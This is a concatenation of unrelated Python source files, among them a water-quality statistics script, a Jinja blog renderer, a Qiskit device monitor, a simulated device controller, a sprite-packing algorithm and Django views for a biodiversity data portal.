dirSel = os.path.join(kPath.dirData, 'USGS', 'inventory', 'siteSel')
with open(os.path.join(dirSel, 'dictRB_Y30N5.json')) as f:
dictSite = json.load(f)
codeLst = sorted(list(set(usgs.newC)-set(rmCode)))
siteNoLst = dictSite[rmName]
trainSet = 'B10N5'
testSet = 'A10N5'
df = pd.DataFrame(index=siteNoLst, columns=usgs.newC)
df.index.name = 'siteNo'
dirRoot = os.path.join(kPath.dirWQ, 'modelStat',
'WRTDS-W', 'B10-{}'.format(rmName))
dirOut = os.path.join(dirRoot, 'output')
dirPar = os.path.join(dirRoot, 'params')
dfCorr1 = df.copy()
dfCorr2 = df.copy()
dfRmse1 = df.copy()
dfRmse2 = df.copy()
t0 = time.time()
for kk, siteNo in enumerate(siteNoLst):
print('{}/{} {:.2f}'.format(
kk, len(siteNoLst), time.time()-t0))
saveFile = os.path.join(dirOut, siteNo)
dfP = pd.read_csv(saveFile, index_col=None).set_index('date')
dfP.index = pd.to_datetime(dfP.index)
dfC = waterQuality.readSiteTS(siteNo, varLst=usgs.newC, freq='W')
yr = dfC.index.year.values
for code in codeLst:
ind1 = np.where(yr < 2010)[0]
ind2 = np.where(yr >= 2010)[0]
rmse1, corr1 = utils.stat.calErr(
dfP.iloc[ind1][code].values, dfC.iloc[ind1][code].values)
rmse2, corr2 = utils.stat.calErr(
dfP.iloc[ind2][code].values, dfC.iloc[ind2][code].values)
dfCorr1.loc[siteNo][code] = corr1
dfRmse1.loc[siteNo][code] = rmse1
dfCorr2.loc[siteNo][code] = corr2
dfRmse2.loc[siteNo][code] = rmse2
dfCorr1.to_csv(os.path.join(
dirRoot, '{}-{}-corr'.format(trainSet, trainSet)))
dfRmse1.to_csv(os.path.join(
dirRoot, '{}-{}-rmse'.format(trainSet, trainSet)))
dfCorr2.to_csv(os.path.join(
dirRoot, '{}-{}-corr'.format(trainSet, testSet)))
dfRmse2.to_csv(os.path.join(
dirRoot, '{}-{}-rmse'.format(trainSet, testSet)))
| 1.984375 | 2 |
blog.py | the-it-dude/the-it-dude | 0 | 12786827 | <gh_stars>0
import logging
from jinja2 import Environment, FileSystemLoader, select_autoescape
import yaml
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger()
CONFIG_FILE = 'blog.yml'
class Blog(object):
def __init__(self, config):
self.env = Environment(
loader=FileSystemLoader('./src'),
autoescape=select_autoescape(['html'])
)
self.config = config
def render(self, source, destination, context=None):
"""
Simply glue files together.
"""
full_context = config.get('context', {})
if context is not None:
full_context.update(context)
logger.info("Rendering file: {} > {}".format(source, destination))
logger.debug(" Context: {}".format(repr(context)))
template = self.env.get_template(source)
template.stream(**full_context).dump(destination)
def render_all(self):
for file_config in self.config['files']:
self.render(
source=file_config['source'],
destination=file_config['destination'],
context=file_config.get('context', None)
)
if __name__ == '__main__':
with open(CONFIG_FILE, 'r') as config_file:
config = yaml.load(config_file)
logger.debug("Config: {}".format(repr(config)))
blog = Blog(config)
blog.render_all()
| 2.6875 | 3 |
app/stratified.py | CMUSTRUDEL/flask-browser | 1 | 12786828 | high_perspective = ['<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5eadd270bd354374a770a538',
'<KEY>',
'<KEY>',
'5e9fa678bd35436be69b2a5e',
'<KEY>',
'<KEY>',
'5eeb0729bd35431ff8d3fadc',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7da4b1bd3543638522a940',
'<KEY>',
'<KEY>',
'5e498c9ebd3543364e1aea31',
'5e40af8bac8db7c63592a473',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9bc38abd35431275afa132',
'<KEY>',
'5e3dd864bd3543283f73ef51',
'5e7af5a3bd354337a360a294',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9588febd35432157acf29a',
'<KEY>',
'5e3adb28bd35434aff586c46',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7aca43bd3543414b890ff0',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e2845eabd35433a5078cde6',
'<KEY>',
'5e799d1ebd35432c2a28f4ab',
'5ebba46bbd3543261a0b75e0',
'<KEY>',
'5e659345bd35432eba36b7e3',
'5e4f012dac8db7c635ab2885',
'<KEY>',
'5e9e7cddbd3543498b9b4e77',
'<KEY>',
'5e258361bd35431073ac3196',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7a0de3bd3543722ec74ac7',
'5ea0ff6ebd354377ca40a4d0',
'<KEY>',
'<KEY>',
'<KEY>',
'5ec24ab8fd9edf38797e3a9e',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8a870abd3543695e4646ea',
'5e88be3ebd35436e5533d48c',
'5ea13209bd3543279b20339e',
'5e3d541abd354331243eb4dc',
'<KEY>',
'5e3d5421bd354321def3b482',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e2e7b63bd3543403ea57f38',
'<KEY>',
'<KEY>',
'5ed0b76bbd35437e4ab4a36e',
'5e7e3e1ebd354371da09d498',
'5e6502debd354322f37901aa',
'<KEY>',
'<KEY>',
'5eac250cbd354310d1e8f9be',
'5e8d7b82bd354311592ae22a',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7b1411bd35433aadd9ed6b',
'<KEY>',
'5e410203bd3543203ed17185',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9fea52bd35432a086f49de',
'<KEY>',
'<KEY>',
'5e87efa0bd35436e55336283',
'5e399811bd35434a9d0c7c1c',
'5e41707eac8db7c635289a8f',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e645fa0bd35433947c40a20',
'<KEY>',
'<KEY>',
'5eb10aa6bd3543708c780cea',
'5e23c281763a8b26aaa38d89',
'<KEY>',
'<KEY>',
'5ea41232bd35436afab04ae0',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8d4551bd354311592ac165',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9083a6bd3543219db58a7d',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9023a6bd35431f6aedacda',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e6ccd72bd35432dd15ea0cc',
'5ea7e713bd3543282eea804d',
'<KEY>',
'<KEY>',
'5e7b1420bd35433aadd9ed88',
'<KEY>',
'5e7db811bd3543626e053297',
'5e5f218abd354338b13aa20b',
'<KEY>',
'<KEY>',
'5e2f36edbd354337baabe23a',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8f748ebd3543228aa00d90',
'<KEY>',
'<KEY>',
'5e2adeb7bd35436fc59907ca',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7b1417bd35434e768d80c3',
'5e3d5415bd3543225ac4afb7',
'<KEY>',
'5e7b1410bd35434522e333a7',
'<KEY>',
'<KEY>',
'5ebaff4fbd35437097d7ddb5',
'<KEY>',
'5e7ea488bd354363e2c0e9db',
'5eb06626bd35435932b3721e',
'5e3abe82bd354349e90125b5',
'5e9d4261bd35437da961e410',
'<KEY>',
'5e8590eebd35437469ebe552',
'<KEY>',
'5e59df4abd354338b1373872',
'5e39a3a7bd35433f22ea7747',
'5eada0c7bd3543688a59f52e',
'<KEY>',
'5ec4af67bd3543763417e159',
'5e2fe146bd35432aa312468c',
'5e8ea238bd35430ccad168c2',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea488f6bd3543694bcebeaa',
'<KEY>',
'5ec89851bd77503ee07636be',
'<KEY>',
'5ea945c9bd354376991ebe60',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e53e3dcbd354338b13337e2',
'<KEY>',
'<KEY>',
'5e7be575bd3543414b89b0e0',
'<KEY>',
'<KEY>',
'5e522329bd35432dd14d1da0',
'<KEY>',
'5e906fe7bd35430f344c1e20',
'5e938361bd35431db66e910b',
'<KEY>',
'5e99d6d3bd35432927e34c30',
'5ec9f26fbd77503ee08adf1e',
'5e3d3d67bd35431de5230ca7',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8e7d1dbd35430a0b73a519',
'5ed26ce8bd77503ee02bf99e',
'<KEY>',
'<KEY>',
'5e657561bd354338b13eb2ce',
'<KEY>',
'5e272a8dbd354343faf9c2e1',
'<KEY>',
'<KEY>',
'5e8066cebd3543464e2f41b8',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7ce40fbd354368c77c0c80',
'<KEY>',
'5e7a9186bd35434c25a298c4',
'<KEY>',
'5ea64998bd35434639f60d6e',
'<KEY>',
'5e7afb8dbd35434ac8ae80fa',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e316a60bd354302f7ea3ec7',
'<KEY>',
'<KEY>',
'5e7fd1a8bd35434921e9b731',
'<KEY>',
'5e9ab7a1bd3543342c24002c',
'5e7fb11abd354352ec828e2d',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e47970bbd3543364e199ece',
'<KEY>',
'<KEY>',
'5e2e87f0bd354373f054d5ed',
'5e54483ebd35432dd14e8194',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3d12e0bd35432ad7dff825',
'<KEY>',
'5ea310d1bd35436ae2e6a350',
'<KEY>',
'5ecd106dbd77503ee084d044',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8c2ad4bd3543797eb5f62a',
'<KEY>',
'5ed0862bbd354355218c17a9',
'5e272ccabd35434161a98f5d',
'<KEY>',
'5e2ec388bd354321507e4d72',
'<KEY>',
'<KEY>',
'<KEY>',
'5eb06041bd354369b7ef3ea0',
'5ed31d92bd354362ae5aeaea',
'5e256551bd35431415399ed2',
'5e8fdd32bd354323b1be9110',
'<KEY>',
'5e761b8ebd35433947cdece3',
'<KEY>',
'<KEY>',
'<KEY>',
'5e4d308bac8db7c63536add9',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7d7b94bd3543616a30f1a7',
'5eb2610abd35433915efd181',
'<KEY>',
'5e645f8abd354325d6a39b78',
'<KEY>',
'5ed23465bd77503ee0de3e9f',
'<KEY>',
'<KEY>',
'5e9e599abd354353bdd065e7',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7a7861bd354343331edbf8',
'<KEY>',
'<KEY>',
'<KEY>',
'5ebeb0d3bd35431a33fbe487',
'5eaffa31bd3543614b1c3016',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ecf6ea1bd354379eaa08910',
'5e7a9e25bd35433ed568a3f5',
'<KEY>',
'5e418388ac8db7c6354c280a',
'<KEY>',
'5ea6d571bd354326d88e6a56',
'5e957591bd35431a34d0b8de',
'5e3d4e42bd35432524f8d755',
'5e93e33abd354324255292d0',
'5e683d18bd354338b1408261',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e399812bd35434a9d0c7c1e',
'<KEY>',
'<KEY>',
'5ece9964bd77503ee00a576a',
'<KEY>',
'5e71d2bbbd35432eba3d8e3d',
'5e4d91dfbd354329f971720e',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea0a066bd35435e12e60e99',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e814e9fbd35435eb45ef974',
'5eca7e7cbd77503ee051cc35',
'<KEY>',
'5ec66ad2bd354336ac2eda08',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e61e85dbd354329f97ed5cc',
'<KEY>',
'<KEY>',
'5ec96cb7bd77503ee0b16e85',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e5b6a75bd35431d33658e9d',
'<KEY>',
'5e4d1763bd354336ddfa06cd',
'5e7a846abd354345e894ab0e',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3a8b01bd354345530000e0',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e512012ac8db7c635ec7617',
'5e7b7eeebd3543414b897709',
'5e9172e5bd3543248842e40a',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7ce02bbd354361056ea950',
'<KEY>',
'5ec8a8e7bd35431974e4a4ed',
'<KEY>',
'<KEY>',
'5e49c9ceac8db7c6353d6ef9',
'5e441dbebd354322c5e93322',
'<KEY>',
'5e3d541dbd354331243eb4e5',
'<KEY>',
'5e2c9fedbd35437d92fe0e01',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3e6a27bd35432981a64085',
'5eca1b95bd77503ee0c1cc4f',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e91a037bd35431e2a669624',
'5e7e0ed7bd354373da170b01',
'5e8d7e93bd3543141202718c',
'5e9d798fbd35431f2574a55c',
'5e86d942bd354374e3114294',
'<KEY>',
'5e2f8f2abd35437c044c5678',
'<KEY>',
'<KEY>',
'5ebe5f00bd35434c6a200fec',
'<KEY>',
'<KEY>',
'5e9752d2bd35432157adccda',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7af95dbd354337435532a1',
'5e7a1747bd3543414b889483',
'<KEY>',
'<KEY>',
'<KEY>',
'5e813d69bd354354052754a2',
'<KEY>',
'<KEY>',
'5e80ae9dbd354353a0dc2383',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e914dedbd35431e73fc59fe',
'5ec9430abd3543575458d4a1',
'<KEY>',
'<KEY>',
'5e5358a6bd35431cf00a1b7e',
'5ec622a4bd35433ac1a19a89',
'5e80536abd354348df041fa4',
'<KEY>',
'<KEY>',
'<KEY>',
'5e848be8bd354373ddad65b2',
'<KEY>',
'<KEY>',
'5e8afa90bd35437156ee4d64',
'5e9d2afabd35431a8b85b190',
'5e7a98c9bd35433f084f7a96',
'<KEY>',
'5e9d3dd0bd35434f2949ae2c',
'<KEY>',
'5e99b714bd35436f01407ffe',
'5e2f1da1bd35436b0ef74e2e',
'5e3a3308bd35433ee0d5e60d',
'<KEY>',
'<KEY>',
'5e39ecb0bd35433ee0d5b850',
'<KEY>',
'<KEY>',
'5e53223abd354337716e6896',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5eb616abbd354362352a6c06',
'5e41a7c8ac8db7c6359415c0',
'5e33d611bd3543374c1ee86e',
'5e63a96dbd354338b13da5b2',
'5ed1d191bd3543696fa10202',
'<KEY>',
'5e9a8a00bd35436c60a03caa',
'5e8df015bd3543139ef158ed',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e922a66bd354322dacba73d',
'5ed328edbd77503ee0480db3',
'<KEY>',
'5e3d541bbd354321def3b477',
'5ec27a5dbd35433e4834cf5f',
'5e59a622bd35431fc2b40e6a',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7a2d5abd354340bd54a35c',
'<KEY>',
'<KEY>',
'5e47a930bd35431fc2a780c3',
'<KEY>',
'<KEY>',
'<KEY>',
'5ebcd306fd9edf38796ca0dc',
'<KEY>',
'<KEY>',
'5e43a73fbd354332d1ed7f63',
'5e812be3bd3543540527480c',
'5e405d59bd354331ede4f2a1',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea9f8e1fd9edf3879dad6aa',
'5e80a416bd354354d26ad3a5',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3da920bd3543221becc934',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ed4977dbd77503ee0951848',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e4b5becac8db7c6358131a6',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ec8c0a5bd3543089e62db6f',
'5e63b642bd3543229fdeee0d',
'5eb4433abd35434d916378b6',
'5e7fc0a7bd35434a41518387',
'5e8cd3e5bd35430f79a5f0a0',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3edca7bd3543221bed8703',
'5e6b2549bd3543229fe23ddf',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea69c4ebd354348d61288bd',
'5e714e6abd35431fc2c29076',
'<KEY>',
'5ec67e9ebd77503ee033b2ab',
'5eb025a2bd3543053232e572',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea40508bd354338a05e2a15',
'5e41a52abd354336ddf21e5c',
'<KEY>',
'<KEY>',
'5e9ad2c7bd3543589e6945dd',
'<KEY>',
'5ec74cf5bd77503ee080be8d',
'5ed36c36bd77503ee0beea33',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ed36c32bd77503ee0bee3e0',
'<KEY>']
| 1.234375 | 1 |
core/models/program_availability.py | themightychris/prevention-point | 1 | 12786829 | <filename>core/models/program_availability.py
from django.db import models
from core.models import Program
class ProgramAvailability(models.Model):
program = models.ForeignKey(Program, on_delete=models.CASCADE)
day_of_week = models.CharField(max_length = 10)
start_time = models.TimeField()
end_time = models.TimeField()
| 1.9375 | 2 |
Basic/Realtimeinfo.py | JHP4911/Quantum-Computing-UK | 51 | 12786830 | print('\nDevice Monitor')
print('----------------')
from qiskit import IBMQ
from qiskit.tools.monitor import backend_overview
IBMQ.enable_account('Insert API token here') # Insert your API token in to here
provider = IBMQ.get_provider(hub='ibm-q')
backend_overview() # Function to get all information back about each quantum device
print('\nPress any key to close')
input() | 2.265625 | 2 |
Battery_Testing_Software/labphew/controller/blink_controller.py | sjoerdsein/FAIR-Battery | 2 | 12786831 | <reponame>sjoerdsein/FAIR-Battery<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
================
Blink controller
================
This is an example of a controller with a fake (invented) device. It should help to guide
developers to create new controllers for real devices.
Example usage can be found at the bottom of the file under if __name__=='__main___'
"""
import logging
import time
class BlinkController:
"""
Blink Controller: Fake Device controller to act as an example.
"""
def __init__(self):
"""
Create Blink controller object which simulates a fake device.
"""
self.logger = logging.getLogger(__name__)
# Set parameters to simulate the device
self.__simulated_device_blink_period= 1 #
self.__simulated_device_start_time = time.time()
self.__simulated_device_status = False
self.__simulated_device_enabled = True
# Set user parameters:
self.max_blink_period = 2
self.min_blink_period = 0.2
self.logger.debug('BlinkController object created')
self.connect()
def connect(self):
"""
Fake method to connect to fake blink device
:return:
:rtype:
"""
self.logger.info('"Connected" to fake blink device')
def set_blink_period(self, period_s):
"""
Method that mimics setting a device parameter.
:param period_s: blink period (in seconds)
:type period_s: float
"""
# You could do some checks first. For example to see if the value is in an allowed range:
if period_s > self.max_blink_period:
self.logger.warning(f'Blink period of {period_s}s exceeds maximum allowed. Setting period to {self.max_blink_period}s')
period_s = self.max_blink_period
if period_s < self.min_blink_period:
self.logger.warning(f'Blink period of {period_s}s exceeds minimum allowed. Setting period to {self.min_blink_period}s')
period_s = self.min_blink_period
# Your code to communicate with the device goes here.
# For the purpose of demonstration, this method simulates setting a parameter on a device:
self.logger.debug('"Sending" blink period of {} to device'.format(period_s))
self.__simulated_device_blink_period = period_s
self.__simulated_device_start_time = time.time()
self.__simulated_device_status = not self.__simulated_device_status
def enable(self, enable):
"""
Method that mimics setting a device parameter.
:param enable: Enable device output
:type enable: bool
"""
# Your code to communicate with the device goes here.
# For the purpose of demonstration, this method simulates setting a parameter on a device:
self.__simulated_device_enabled = bool(enable)
self.logger.debug('Device is "{}"'.format(self.__simulated_device_enabled))
def get_status(self):
"""
Method that mimics communicating with a device and retrieving a status.
:return: True when device is "on"
:rtype: bool
"""
# Your code to communicate with the device goes here.
# For the purpose of demonstration, this method returns a simulated status:
if self.__simulated_device_enabled:
return bool(int((time.time()-self.__simulated_device_start_time)/self.__simulated_device_blink_period/.5) % 2)
else:
self.logger.warning('Device is disabled')
return False
def disconnect(self):
"""
Fake method to disconnect from fake blink device
:return:
:rtype:
"""
self.logger.info('"Disconnected" from fake blink device')
if __name__ == "__main__":
import labphew # Import labphew, for labphew style logging
device = BlinkController()
print('The state if the device is:', device.get_status())
# Example of modifying the blink period:
device.set_blink_period(3)
device.set_blink_period(0.1)
# # Example of acquiring data (the device state) in a for loop and then plotting it with matplotlib:
# import matplotlib.pyplot as plt
# record = []
# for i in range(100):
# time.sleep(0.01)
# record.append(device.get_status())
# plt.plot(record)
| 3.21875 | 3 |
glue/algorithms/square.py | glensc/glue | 514 | 12786832 | import copy
class SquareAlgorithmNode(object):
def __init__(self, x=0, y=0, width=0, height=0, used=False,
down=None, right=None):
"""Node constructor.
:param x: X coordinate.
:param y: Y coordinate.
:param width: Image width.
:param height: Image height.
:param used: Flag to determine if the node is used.
:param down: Down :class:`~Node`.
:param right Right :class:`~Node`.
"""
self.x = x
self.y = y
self.width = width
self.height = height
self.used = used
self.right = right
self.down = down
def find(self, node, width, height):
"""Find a node to allocate this image size (width, height).
:param node: Node to search in.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
if node.used:
return self.find(node.right, width, height) or self.find(node.down, width, height)
elif node.width >= width and node.height >= height:
return node
return None
def grow(self, width, height):
""" Grow the canvas to the most appropriate direction.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
can_grow_d = width <= self.width
can_grow_r = height <= self.height
should_grow_r = can_grow_r and self.height >= (self.width + width)
should_grow_d = can_grow_d and self.width >= (self.height + height)
if should_grow_r:
return self.grow_right(width, height)
elif should_grow_d:
return self.grow_down(width, height)
elif can_grow_r:
return self.grow_right(width, height)
elif can_grow_d:
return self.grow_down(width, height)
return None
def grow_right(self, width, height):
"""Grow the canvas to the right.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
old_self = copy.copy(self)
self.used = True
self.x = self.y = 0
self.width += width
self.down = old_self
self.right = SquareAlgorithmNode(x=old_self.width,
y=0,
width=width,
height=self.height)
node = self.find(self, width, height)
if node:
return self.split(node, width, height)
return None
def grow_down(self, width, height):
"""Grow the canvas down.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
old_self = copy.copy(self)
self.used = True
self.x = self.y = 0
self.height += height
self.right = old_self
self.down = SquareAlgorithmNode(x=0,
y=old_self.height,
width=self.width,
height=height)
node = self.find(self, width, height)
if node:
return self.split(node, width, height)
return None
def split(self, node, width, height):
"""Split the node to allocate a new one of this size.
:param node: Node to be splitted.
:param width: New node width.
:param height: New node height.
"""
node.used = True
node.down = SquareAlgorithmNode(x=node.x,
y=node.y + height,
width=node.width,
height=node.height - height)
node.right = SquareAlgorithmNode(x=node.x + width,
y=node.y,
width=node.width - width,
height=height)
return node
class SquareAlgorithm(object):
def process(self, sprite):
root = SquareAlgorithmNode(width=sprite.images[0].absolute_width,
height=sprite.images[0].absolute_height)
# Loot all over the images creating a binary tree
for image in sprite.images:
node = root.find(root, image.absolute_width, image.absolute_height)
if node: # Use this node
node = root.split(node, image.absolute_width, image.absolute_height)
else: # Grow the canvas
node = root.grow(image.absolute_width, image.absolute_height)
image.x = node.x
image.y = node.y
| 3.515625 | 4 |
apps/page/views.py | v02202/portal20 | 0 | 12786833 | import re
import csv
import codecs
import json
import os
import environ
from django.shortcuts import render, get_object_or_404
from django.http import (
HttpResponse,
HttpResponseNotFound,
)
from django.db.models import (
Q,
F,
Count,
Sum
)
from django.conf import settings
from apps.data.models import (
Dataset,
Taxon,
SimpleData,
)
from apps.article.models import Article
from .models import Post, Journal
from utils.mail import taibif_mail_contact_us
from apps.data.helpers.stats import get_home_stats
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_GET
def index(request):
news_list = Article.objects.filter(category='NEWS').all()[0:4]
event_list = Article.objects.filter(category='EVENT').all()[0:4]
update_list = Article.objects.filter(category='UPDATE').all()[0:4]
#topic_list = Article.objects.filter(category__in=['SCI', 'TECH', 'PUB']).order_by('?').all()[0:10]
topic_list = Article.objects.filter(is_homepage=True).order_by('?').all()[0:10]
context = {
'news_list': news_list,
'event_list': event_list,
'update_list': update_list,
'topic_list': topic_list,
'stats': get_home_stats(),
}
return render(request, 'index.html', context)
def publishing_data(request):
return render(request, 'publishing-data.html')
def journals(request):
Journal_url = Journal.objects.all()
return render(None,'journals.html', locals())
def cookbook(request):
return render(request, 'cookbook.html')
def cookbook_detail_1(request):
return render(request, 'cookbook-detail-1.html')
def cookbook_detail_2(request):
return render(request, 'cookbook-detail-2.html')
def cookbook_detail_3(request):
return render(request, 'cookbook-detail-3.html')
def tools(request):
return render(request, 'tools.html')
def contact_us(request):
if request.method == 'GET':
return render(request, 'contact-us.html')
elif request.method == 'POST':
data = {
'name': request.POST.get('name', ''),
'cat': request.POST.get('cat', ''),
'email': request.POST.get('email', ''),
'content': request.POST.get('content', ''),
}
context = taibif_mail_contact_us(data)
#context = taibif_send_mail(subject, content, settings.SERVICE_EMAIL, to_list)
return render(request, 'contact-us.html', context)
def plans(request):
return render(request, 'plans.html')
def links(request):
Post_url = Post.objects.all()
return render(None,'links.html', locals())
def about_taibif(request):
return render(request, 'about-taibif.html')
def about_gbif(request):
return render(request, 'about-gbif.html')
def open_data(request):
return render(request, 'open-data.html')
def data_stats(request):
is_most = request.GET.get('most', '')
query = Dataset.objects #.exclude(status='Private')
if is_most:
query = query.filter(is_most_project=True)
context = {
'dataset_list': query.order_by(F('pub_date').desc(nulls_last=True)).all(),
'env': settings.ENV
}
return render(request, 'data-stats.html', context)
def common_name_checker(request):
global results
if request.method == 'GET':
q = request.GET.get('q', '')
sep = request.GET.get('sep', '')
context = {
'q': q,
'sep': sep,
}
return render(request, 'tools-common_name_checker.html', context)
elif request.method == 'POST':
q = request.POST.get('q', '')
sep = request.POST.get('sep', 'n')
if not q:
context = {
'message': {
'head': '輸入錯誤',
'content': '請輸入中文名',
}
}
return render(request, 'tools-common_name_checker.html', context)
if q in ['台灣', '臺灣']:
context = {
'message': {
'head': '結果太多',
'content': '請輸入更完整中文名',
},
'sep': sep,
'q': q,
}
return render(request, 'tools-common_name_checker.html', context)
if not sep:
sep = 'n'
results = []
if sep not in [',', 'n']:
return HttpResponseNotFound('err input')
sep_real = '\n' if sep == 'n' else sep
cname_list = q.split(sep_real)
cname_list = list(set(cname_list))
#taiwan_char_check_exclude = ['台灣留鳥', '台灣過境', '台灣亞種', '台灣特有亞種']
for cn in cname_list:
cn = cn.strip()
q_replace = ''
if '台灣' in cn:
q_replace = cn.replace('台灣', '臺灣')
if '臺灣' in cn:
q_replace = cn.replace('臺灣', '台灣')
row = {
'common_name': cn,
'match_type': 'no match',
'match_list': []
}
taxa = Taxon.objects.filter(rank='species')
if q_replace:
row['q_replace'] = q_replace
taxa = Taxon.objects.filter(Q(name_zh__icontains=cn) | Q(name_zh__icontains=q_replace)).all()
else:
taxa = Taxon.objects.filter(name_zh__icontains=cn).all()
if taxa:
row['match_type'] = 'match'
for t in taxa:
row['match_list'].append(t)
results.append(row)
context = {
'results': results,
'q': q,
'sep': sep,
}
return render(request, 'tools-common_name_checker.html', context)
def export_csv(request):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="users.csv"'
response.write(codecs.BOM_UTF8)
writer = csv.writer(response)
for row in results:
writer.writerow(row['match_list'])
return response
def trans(request):
translate_str = _("這裡放需要翻譯的文字")
context = {"translate_str": translate_str}
return render(request, 'index.html', context)
@require_GET
def robots_txt(request):
if os.environ.get('ENV')=='prod':
lines = [
"User-Agent: *",
"Disallow: /admin/",
]
return HttpResponse("\n".join(lines), content_type="text/plain")
else:
lines = [
"User-Agent: *",
"Disallow: /",
]
return HttpResponse("\n".join(lines), content_type="text/plain")
## Kuan-Yu added for API occurence record
def test(request):
Yearquery = SimpleData.objects \
.filter(scientific_name='Rana latouchii') \
.values('scientific_name', 'vernacular_name', 'year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-count')
year_rows = [{
'key': x['scientific_name'],
'label': x['vernacular_name'],
'year': x['year'],
'count': x['count']
} for x in Yearquery]
context = {
'occurrence_list': year_rows,
}
return render(request, 'test.html', context)
###example
filt1 = 'speices'
filt2 = 'database'
pk1 = '<NAME>'
pk2 = 'manager_17_15'
pk3 = '<NAME>'
pk4 = 'e10100001_4_10'
def ChartYear(request):
if filt1 == 'hi':
species = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3))
sp_year = species.values('year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in sp_year
]
]
if filt2 == 'you':
dataset = SimpleData.objects.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_year = dataset.values( 'year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in data_year
]
]
